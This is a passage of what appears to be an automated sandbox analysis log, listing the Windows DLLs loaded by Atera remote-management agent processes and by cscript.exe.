                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wscapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: napinsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: pnrpnsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wshbth.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: nlaapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winrnr.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptnet.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: winnsi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasman.dll
